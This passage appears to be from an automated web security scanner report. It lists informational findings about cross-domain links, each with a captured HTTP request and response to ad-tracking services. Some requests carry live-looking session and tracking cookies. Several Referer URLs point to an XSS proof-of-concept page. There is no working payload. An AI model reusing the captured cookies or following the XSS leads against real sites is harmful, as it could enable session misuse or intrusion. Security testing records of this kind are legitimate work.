Server: Microsoft-IIS/7.5
X-Awesomed-By: Thundera RE-TP.JR.NC
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: stop_mobi=; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: stop_mobi=; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: dus=ci=security-network&th=sb360; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:07 GMT
Content-Length: 53254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xm
...[SNIP]...
<span class="omnitureADTrack" omnitureadid="DB10BF3F"><a href="http://www.delltrainingcentre.com/?dgc=IR&amp;lid=1F0FA8DC&amp;cid=&amp;dgc=IR&amp;lid=DB10BF3F&amp;cid="><img alt="Security Online Training" class="Security Online Training" src="http://i.dell.com/sites/content/business/smb/merchandizing/en/PublishingImages/7-7-solutions-736x120-security.jpg" title="Secur
...[SNIP]...
<td><a href="http://dell.force.com/TalkToDell?c=us&amp;s=bsd&amp;l=en&amp;cs=sc-sec" target="_blank"><img alt="Request a Callback" src="http://i.dell.com/sites/content/business/smb/merchandizing/en/PublishingImages/7_12_solutions_150x50-callback.jpg" />
...[SNIP]...
<p style="text-align: center;"><a href="https://dell-inc.webex.com/dell-inc/onstage/g.php?p=39&amp;t=m" target="_blank"><img style="border-bottom:0px solid;border-left:0px solid;border-top:0px solid;border-right:0px solid" alt="Security Solutions Webinar" src="http://i.dell.com/sites/content/fragments/en/PublishingImage
...[SNIP]...
<p style="text-align: center;"><a href="http://demosondemand.com/reseller/dell/001/page/demos.asp" target="_blank"><img style="border:0px solid" alt="SonicWALL Demos on Demand" src="http://i.dell.com/sites/content/fragments/en/PublishingImages/sb360/us-7-27-sonicwall2-230x120.jpg" />
...[SNIP]...
<li><a href="http://www.juniper.net/us/en/company/partners/global/dell/sizingtool/" target="_blank">Dell PowerConnect J-SRX Product Advisor</a>
...[SNIP]...
<li><a href="http://www.accelacomm.com/acc/solutions_center/0/51098101/" target="_blank">Today's Blended Threats and Dell's Approach to Multilayered Security</a>
...[SNIP]...
<li><a href="http://www.juniper.net/us/en/company/partners/global/dell/sizingtool/" target="_blank">Dell PowerConnect J-SRX Product Advisor</a>
...[SNIP]...
<li><a href="https://www.techwebonlineevents.com/ars/eventregistration.do?mode=eventreg&amp;F=1002696&amp;K=4ON" target="_blank">Solutions for Securing your Network</a>
...[SNIP]...
<li><a href="https://www.techwebonlineevents.com/ars/eventregistration.do?mode=eventreg&amp;F=1002475&amp;K=4ON" target="_blank">Security Secrets: Layering on Protection</a>
...[SNIP]...
<li><a href="http://www.ideastorm.com/">IdeaStorm</a>
...[SNIP]...

17.23. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=&profile.pt=&profile.catid=&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8923
Date: Sun, 04 Sep 2011 16:19:14 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...
<td align="center" class="tnt-td"><img src="https://si.cdn.dell.com/images/global/ecomm/progbar/status_tracker_step'+ step +'.jpg" width="570" height="55" alt="Progress Bar"></td>
...[SNIP]...

17.24. http://ecustomeropinions.com/survey/survey.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /survey/survey.php?sid=603736412&data1=5.5.0.115&data2=xss.cx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<br /> please visit: <a href="http://support.skype.com/" target=_blank>http://support.skype.com/</a>
...[SNIP]...
<p id="ecos_711583617"> <a class="ng_a_newwin" href='http://www.skype.com/intl/en-gb/legal/privacy/general/'>Privacy Policy</a>
...[SNIP]...
<div id="footer_logo">
<a href="http://www.edigitalresearch.com" onclick="window.open(this.href,'newwin');return false;">
<img src="surveyasset.php?vault=_&amp;key=977317699:1285066751:live:edr_footer_logo.png" alt="eDigitalResearch" height="48" width="190"
id="edr_footer_logo" />
...[SNIP]...
<p>
<a href="http://www.skype.com/intl/en-gb/legal/privacy/general/" target="_blank" id="privacy_pol_link">Privacy Policy</a>
...[SNIP]...
<div id="w3c_logo">
<a href="http://validator.w3.org/check?uri=referer">
<img src="surveyasset.php?vault=_&amp;key=977317699:1285066751:live:w3c_valid_xhtml.gif" alt="Valid XHTML 1.0 Strict" height="15"
width="80" id="valid_xml_img" />
...[SNIP]...

17.25. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.skype.com/intl/en-us/tell-a-friend/?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6=
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: fls.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 21:13:40 GMT
Expires: Sun, 04 Sep 2011 21:13:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1894
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://media.fastclick.net/w/tre?ad_id=22273;evt=17163;cat1=21276;cat2=21277;rand=1234" width="1" height="1" border="0"><!-- Google Code for Remarketing- Paid Service Interest Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1053178592/?label=gR1dCKLtrQEQ4PWY9gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif?labels=_fp.event.Paid+Service+Interest" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag --><script type="text/javascript" src="http://pixel.mathtag.com/event/js?mt_id=101515&mt_adid=100287&v1=&v2=&v3=&s1=&s2=&s3="></script><img src="http://www.imiclk.com/cgi/r.cgi?m=3&mid=882Mb6AW&ptid=SRCH&sp=1" width="1" height="1" border="0"><img src="http://pixel.33across.com/ps/?pid=208&amp;cgn=14038&amp;seg=7820"style="visibility:hidden;width:1px;height:1px;"></body>
...[SNIP]...

17.26. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2305757;type=hpcom559;cat=hpcom619;ord=1;num=6795315628405.66? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://search.hp.com/query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 16:19:47 GMT
Expires: Sun, 04 Sep 2011 16:19:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 732
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<IMG SRC="http://ad.doubleclick.net/activity;src=2964791;type=hpcom779;cat=hpcom893;ord=1;num=1780189597?" WIDTH=1 HEIGHT=1 BORDER=0>
<img src="http://ad.yieldmanager.com/pixel?id=1071987&t=2" width="1" height="1" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=OXjiCKX85AEQ6_zU7AM&amp;guid=ON&amp;script=0"/>
<img border="0" src="http://r.turn.com/r/beacon?b2=xsKlvalg4lwfy8LPcIiVCPKkpSxp_RJng-zvuwC70piejuJEq_LImxDsetEai8Le1n88qWVlF6FRdkauRZlBdQ"></body>
...[SNIP]...

17.27. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=2609787;type=displ949;cat=group502;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/?cm_mmc=ICDC|0928_B1-_-Credit-generic-1407
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: fls.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 21:27:56 GMT
Expires: Sun, 04 Sep 2011 21:27:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 303
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://www.imiclk.com/cgi/r.cgi?m=3&mid=882Mb6AW&tid=1&sale=&sp=1" width="1" height="1" border="0"></body>
...[SNIP]...

17.28. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2609787;type=skype282;cat=webre621;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c
Host: fls.doubleclick.net
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114
Accept-Language: en-US

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 18:00:24 GMT
Expires: Sun, 04 Sep 2011 18:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1239
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://secure.fastclick.net/w/tre?ad_id=22273;evt=17590;cat1=22008;cat2=22009;rand=[CACHEBUSTER]" width="1" height="1" border="0"><img width="0" height="0" src="https://www.burstbeacon.com/beacon/73186/0/0/0"><img src="https://ad.amgdgt.com/ads/?t=ap&px=15074&rnd=[cachebuster]" width="1" height="1" border="0"/><!-- Google Code for RU Optimized Conversion Pixel Conversion Page -->
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1053178592/?label=ffKKCMC-iwIQ4PWY9gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

17.29. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3440800076797949&output=html&h=280&slotname=1699448869&w=336&lmt=1315208099&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Fdom_obj_base.asp&dt=1315190098873&bpp=58&shv=r20110824&jsv=r20110719&correlator=1315190099027&frm=4&adk=571601861&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=1852471489&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1250&bih=910&ref=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Fjs_ex_dom.asp&fu=0&ifi=5&dtd=244&xpc=dpFSDdXR9D&p=http%3A//www.w3schools.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:34:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 3793
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.w3schools.com/jsref/dom_obj_base.asp%26hl%3Den%26client%3Dca-pub-3440800076797949%26adU%3Dwww.wix.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHjJUt7Ha-rSy47nTcWTl_ugqfkpg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.30. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315139533&flash=0&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%23win.eval%2Ffunction%2520(a%2Cc)&dt=1315188805128&bpp=20&shv=r20110824&jsv=r20110719&correlator=1315188805988&frm=4&adk=1607234649&ga_vid=1636391529.1315188813&ga_sid=1315188813&ga_hid=229851842&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=96&dff=serif&dfs=16&biw=1053&bih=512&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=7630&xpc=t80OgZaGXZ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:12:56 GMT
Server: cafe
Cache-Control: private
Content-Length: 4184
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dnewrelic.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF8eYO76A_pcITx8RwVYk3L9LekKQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.31. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3440800076797949&output=html&h=280&slotname=1699448869&w=336&lmt=1315208270&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Fevent_frame_onload.asp&dt=1315190270296&bpp=86&shv=r20110824&jsv=r20110719&correlator=1315190270398&frm=4&adk=571601861&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=1065862141&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&adx=424&ady=1966&biw=1250&bih=910&eid=36887102&ref=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Fdom_obj_frame.asp&fu=0&ifi=5&dtd=120&xpc=EpGd7MkRNw&p=http%3A//www.w3schools.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:37:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 4402
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="336" HEIGHT="280"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAtPXEWxDQAhiYAjIIwbBtz4chkiY">
...[SNIP]...
6adurl%3Dhttps://services.google.com/fb/forms/adwordscoupon/%253Fsite%253Dna-gdn-ctx-fl%2526utm_term%253Dgdn-fl-ctx-3uc%2526utm_source%253Dgdn-fl-ctx-3uc%2526utm_medium%253Dad%2526utm_campaign%253Den"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAtPXEWxDQAhiYAjIIwbBtz4chkiY" id="google_flash_embed" WIDTH="336" HEIGHT="280" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBh03o2TVkTvi9GqbqjASBwNHYAr2H_dsB9Y2bqR3AjbcBkN5OEAEYASDn6PoBOABQ-rC98gJgydb6hsijoBmgAfushPsDsgERd3d3Lnczc2Nob29scy5jb226AQozMzZ4MjgwX2FzyAEE2gE1aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzcmVmL2V2ZW50X2ZyYW1lX29ubG9hZC5hc3C4AhioAwHoA90F6AOmA-gD0Qn1AwIAAESgBgQ%26num%3D1%26sig%3DAOD64_27nespbfno92WNXC-ApaO50gk2iQ%26client%3Dca-pub-3440800076797949%26adurl%3Dhttps://services.google.com/fb/forms/adwordscoupon/%253Fsite%253Dna-gdn-ctx-fl%2526utm_term%253Dgdn-fl-ctx-3uc%2526utm_source%253Dgdn-fl-ctx-3uc%2526utm_medium%253Dad%2526utm_campaign%253Den" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.w3schools.com/jsref/event_frame_onload.asp%26hl%3Den%26client%3Dca-pub-3440800076797949%26adU%3Dwww.google.com/AdWords%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGiaHnjyIRdnTF0gi6i574F8zFadw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.32. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315157533&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%23win.eval%2Ffunction%20(a%2Cc)&dt=1315188789608&bpp=35&shv=r20110824&jsv=r20110719&correlator=1315188792293&frm=4&adk=1607234649&ga_vid=1925020604.1315188793&ga_sid=1315188793&ga_hid=481637659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=268&biw=1250&bih=894&eid=36887102&fu=0&ifi=1&dtd=2947&xpc=vIJThNUcJG&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
